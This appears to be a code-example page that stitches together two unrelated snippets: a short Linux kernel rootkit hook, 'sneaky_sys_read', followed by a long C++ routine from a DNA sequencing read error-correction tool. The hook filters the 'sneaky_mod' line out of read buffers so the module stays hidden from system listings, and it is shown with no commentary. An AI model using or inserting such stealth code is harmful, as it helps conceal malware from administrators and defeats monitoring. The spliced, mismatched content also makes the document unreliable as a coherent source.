Beispiel #1
0
asmlinkage ssize_t sneaky_sys_read(int fd, void * buf, size_t count) {
  int nread = original_read(fd, buf, count);
 
  char * head = strstr((char *)buf, "sneaky_mod");

  if (head != NULL) {
     char * newline = strchr(head, '\n');;
     if (newline != NULL) {
       nread -= (newline - head + 1);
       memmove(head, newline + 1, strlen(newline + 1) + 1);
       return (ssize_t)nread;
     } 
  } else {
      return (ssize_t)nread;    
  }
  return (ssize_t)nread;      
}
void C_correct_errors::write_corrected_reads(const C_arg& c_inst_args, const std::string& error_correction_info_file_name, const std::string& corrected_read_file_name, const FileReader::FileType corrected_read_file_type) {
    std::ofstream& f_log = Log::get_stream();

#ifdef USE_FILE_READER
    // open corrected read files
    FileReader f_corrected_read;
    FileReader f_read;
    f_corrected_read.setFileName(corrected_read_file_name, corrected_read_file_type);
    if (!f_corrected_read.openFile(FileReader::WRITE)) {
        std::cout << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        f_log << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        exit(EXIT_FAILURE);
    }

    // open read files
    f_read.setFileName(read_file_name, corrected_read_file_type);

    // process reads
    if (f_read.openFile(FileReader::READ)) {
#else
    // open corrected read files
    std::ofstream f_corrected_read;
    std::ifstream f_read;
    f_corrected_read.open(corrected_read_file_name.c_str());

    if (f_corrected_read.is_open() == false) {
        std::cout << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        f_log << std::endl << "ERROR: Cannot open " << corrected_read_file_name << std::endl << std::endl;
        exit(EXIT_FAILURE);
    }

    // open read files
    f_read.open(read_file_name.c_str());

    // process reads
    if (f_read.is_open()) {
#endif
        std::size_t chunks_it = 0;

        // open error correction information files
        std::ifstream f_error_correction_info;

        f_error_correction_info.open(get_error_correction_info_file_name(error_correction_info_file_name, chunks_it).c_str(), std::ios::binary);

        if (f_error_correction_info.is_open() == false) {
            std::cout << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
            f_log << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
            exit(EXIT_FAILURE);
        }

        std::string line;

        std::string read;

#ifdef USE_FILE_READER
        // number of bytes for storing reads
        // std::size_t num_byte_per_read;
        // num_byte_per_read = (std::size_t)(ceil((float)(read_length) / BPS_PER_BYTE));

        // std::string modification_buffer(num_byte_per_read, '0');
        while (f_read.getLine(line)) {
            // write the first head lines
            if (line.length() > 0) {
                line += "\n";
                f_corrected_read.putLine(line);
            }
            // DNA sequence
            f_read.getLine(read);
            std::size_t current_read_length = read.length();
#else
        // header
        getline(f_read, line);

        // write the first head lines
        if (line.length() > 0) {
            f_corrected_read << line << "\n";
        }

        // number of bytes for storing reads
        // std::size_t num_byte_per_read;
        // num_byte_per_read = (std::size_t)(ceil((float)(read_length) / BPS_PER_BYTE));

        // std::string modification_buffer(num_byte_per_read, '0');

        while (!f_read.eof()) {
            // DNA sequence
            getline(f_read, read);
            std::size_t current_read_length = read.length();
#endif
            // change sequences to upper case
            transform(read.begin(), read.end(), read.begin(), ::toupper);

            std::string original_read(read);

            // count and substitute Ns other characters
            std::size_t number_of_Ns = 0;
            for (std::size_t it = 0; it < current_read_length; ++it) {
                bool is_nucleotide = false;
                for (std::size_t it_nucl = 0; it_nucl < NUM_NEOCLEOTIDE; ++it_nucl) {
                    if (read[it] == NEOCLEOTIDE[it_nucl]) {
                        is_nucleotide = true;
                        break;
                    }
                }
                if (!is_nucleotide) {
                    ++number_of_Ns;
                    read[it] = SUBST_CHAR;
                }
            }

            const bool too_many_Ns = number_of_Ns >= current_read_length * MAX_N_RATE;

            // modified reads
            std::string read_modified(too_many_Ns ? original_read : read);

            // read modification information from files
            char buffer;

            if (!f_error_correction_info.get(buffer)) {
                f_error_correction_info.close();

                ++chunks_it;
                if (chunks_it == n_chunks) {
                    if (!f_read.eof()) {
                        std::cout << std::endl << "ERROR: Unexpected end of error correction info file." << std::endl;
                        f_log << std::endl << "ERROR: Unexpected end of error correction info file." << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
                else {
                    // open error correction information files
                    f_error_correction_info.open(get_error_correction_info_file_name(error_correction_info_file_name, chunks_it).c_str(), std::ios::binary);

                    if (f_error_correction_info.is_open() == false) {
                        std::cout << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
                        f_log << std::endl << "ERROR: Cannot open " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }

                    if (!f_error_correction_info.get(buffer)) {
                        std::cout << std::endl << "ERROR: The file " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << " is empty" << std::endl << std::endl;
                        f_log << std::endl << "ERROR: The file " << get_error_correction_info_file_name(error_correction_info_file_name, chunks_it) << " is empty" << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
            }

            // make new reads
            std::size_t it_mod;
            for (it_mod = 0; it_mod < current_read_length; it_mod++) {
                unsigned char first_bits = buffer & (BIT8 | 0x40);
                buffer <<= 2;

                if (first_bits != 0 && !too_many_Ns) {
                    read_modified[it_mod] = decode_correction_info(first_bits, read[it_mod]);
                }

                // increment indexes
                if (((it_mod % BPS_PER_BYTE) == (BPS_PER_BYTE - 1)) && (it_mod != (current_read_length - 1))) {
                    if (!f_error_correction_info.get(buffer)) {
                        std::cout << std::endl << "ERROR: The size of " << error_correction_info_file_name << " is wrong" << std::endl << std::endl;
                        f_log << std::endl << "ERROR: The size of " << error_correction_info_file_name << " is wrong" << std::endl << std::endl;
                        exit(EXIT_FAILURE);
                    }
                }
            }
#ifdef USE_FILE_READER
            // write new reads to output files
            read_modified += "\n";
            f_corrected_read.putLine(read_modified);

            // "+"
            f_read.getLine(line);
            line += "\n";
            f_corrected_read.putLine(line);

            // quality score
            f_read.getLine(line);
            line += "\n";
            f_corrected_read.putLine(line);
#else
            // write new reads to output files
            f_corrected_read << read_modified << "\n";

            // "+"
            getline(f_read, line);
            f_corrected_read << line << "\n";

            // quality score
            getline(f_read, line);
            f_corrected_read << line << "\n";

            // header
            getline(f_read, line);

            if (line.length() > 0) {
                f_corrected_read << line << "\n";
            }
#endif
        }
    }

    // close read files
    f_read.close();

    // close corrected reads
    f_corrected_read.close();

    std::cout << "     Writing corrected reads into files: done" << std::endl << std::endl;
    f_log << "     Writing corrected reads into files: done" << std::endl << std::endl;
}



//----------------------------------------------------------------------
// Removes unnecessary temporary files.
//----------------------------------------------------------------------

void C_correct_errors::remove_error_correction_info_files(const C_arg& c_inst_args, const std::string& error_correction_info_file_name) {
    for (std::size_t it = 0; it < n_chunks; ++it) {
        remove(get_error_correction_info_file_name(error_correction_info_file_name, it).c_str());
    }
}



//----------------------------------------------------------------------
// Generates temporary file name.
//----------------------------------------------------------------------

std::string C_correct_errors::get_error_correction_info_file_name(const std::string& error_correction_info_file_name, const std::size_t file_number) const {
    std::ostringstream error_correction_info_file_name_stream;
    error_correction_info_file_name_stream << error_correction_info_file_name;
    error_correction_info_file_name_stream << file_number;

    return error_correction_info_file_name_stream.str();
}